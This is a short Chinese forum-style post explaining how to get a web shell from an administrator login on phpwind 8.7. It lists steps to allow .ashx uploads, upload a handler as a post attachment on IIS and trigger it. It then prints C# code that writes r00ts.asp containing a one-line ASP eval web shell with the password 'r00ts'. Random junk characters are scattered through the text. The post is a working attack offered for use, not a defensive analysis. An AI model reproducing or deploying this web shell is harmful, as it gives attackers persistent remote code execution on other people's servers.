phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
: |+ F( N' _6 V) a2 Z
' E( I% m  T; u) ?/ T' g) @! ?" y群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx

7 U7 r& [- Z; D+ I6 `( J% q8 ?发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
; B* L- [  ]; L8 j1 p" c# H
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx

打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
& G' x8 r7 J, l
, j2 [  i/ O9 [, j) X下面是代码:

" U6 f; F: x' `3 E<%@ WebHandler Language="C#"Class="Handler" %>
9 @  E/ @2 u6 x" y- l) @using System;
using System.Web;
  P0 ~, ~: V' x1 E% |8 Rusing System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
( M3 s. ?8 X6 Q7 ~6 t) [; |$ Hcontext.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
# r9 U) a& a' G& @* O& l: vfile1.Write("<%eval request(\"r00ts\")%>");
file1.Flush();
file1.Close();
}
; ?( H* I. L( [3 bpublic bool IsReusable {
get {
return false;
}
9 n3 X" A: S( q$ F! b$ Z}
* I" H! u2 l4 i( j% G3 ^5 V}
0 F3 i" F, {: I